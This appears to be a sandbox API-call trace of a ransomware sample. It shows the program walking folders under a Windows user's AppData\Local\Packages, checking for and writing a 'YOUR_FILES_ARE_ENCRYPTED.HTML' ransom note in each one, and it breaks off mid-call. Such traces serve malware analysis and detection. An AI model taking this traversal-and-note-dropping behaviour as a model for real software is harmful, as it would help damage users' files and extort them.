[0121.312] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="80") returned 2 [0121.312] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="B5") returned 2 [0121.312] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="A5") returned 2 [0121.312] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="BD") returned 2 [0121.312] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0B") returned 2 [0121.312] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat" [0121.312] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.312] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.312] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc372dde6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc372dde6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc372dde6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0121.312] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.312] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 109 [0121.312] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.312] lstrlenW (lpString=".LOG1") returned 5 [0121.312] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.312] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc372dde6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc372dde6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc372dde6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0121.312] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.312] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 109 [0121.313] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.313] lstrlenW (lpString=".LOG2") returned 5 [0121.313] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.313] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc372dde6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc372dde6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc372dde6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0121.313] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0121.313] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0121.313] GetProcessHeap () returned 0x600000 [0121.313] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.314] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.315] CloseHandle (hObject=0x338) returned 1 [0121.315] GetProcessHeap () returned 0x600000 [0121.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.315] GetProcessHeap () returned 0x600000 [0121.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.315] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.315] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.315] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData") returned 96 [0121.315] GetProcessHeap () returned 0x600000 [0121.315] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.315] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData" [0121.315] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData\\*" [0121.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0121.315] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 1 [0121.315] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 0 [0121.315] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0121.315] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.316] GetProcessHeap () returned 0x600000 [0121.316] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.316] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.317] CloseHandle (hObject=0x338) returned 1 [0121.317] GetProcessHeap () returned 0x600000 [0121.317] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.317] GetProcessHeap () returned 0x600000 [0121.317] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.317] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.317] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.317] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState") returned 92 [0121.317] GetProcessHeap () returned 0x600000 [0121.317] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.317] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState" [0121.317] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\*" [0121.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.318] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 1 [0121.318] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187b5e, dwReserved1=0x3187ab8, cFileName="..", cAlternateFileName="")) returned 0 [0121.318] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.318] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0121.318] GetProcessHeap () returned 0x600000 [0121.318] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.318] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.319] CloseHandle (hObject=0x338) returned 1 [0121.319] GetProcessHeap () returned 0x600000 [0121.319] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.319] GetProcessHeap () returned 0x600000 [0121.319] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.319] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b6deebf, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b6deebf, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1b6deebf, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0121.319] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.319] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0121.320] GetProcessHeap () returned 0x600000 [0121.320] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.320] WriteFile (in: hFile=0x214, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.321] CloseHandle (hObject=0x214) returned 1 [0121.321] GetProcessHeap () returned 0x600000 [0121.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.321] GetProcessHeap () returned 0x600000 [0121.321] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.322] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="windows.immersivecontrolpanel_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.IMM")) returned 1 [0121.322] StrStrIW (lpFirst="windows.immersivecontrolpanel_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.322] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy") returned 92 [0121.323] GetProcessHeap () returned 0x600000 [0121.323] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.323] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy" [0121.323] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\*" [0121.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efcf224, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0121.329] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efcf224, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efcf224, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0121.330] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0121.330] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.330] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC") returned 95 [0121.330] GetProcessHeap () returned 0x600000 [0121.330] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.330] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC" [0121.330] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\*" [0121.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.331] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0121.331] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5efa8e98, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5efa8e98, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5efa8e98, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0121.331] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.331] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0121.331] GetProcessHeap () returned 0x600000 [0121.331] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 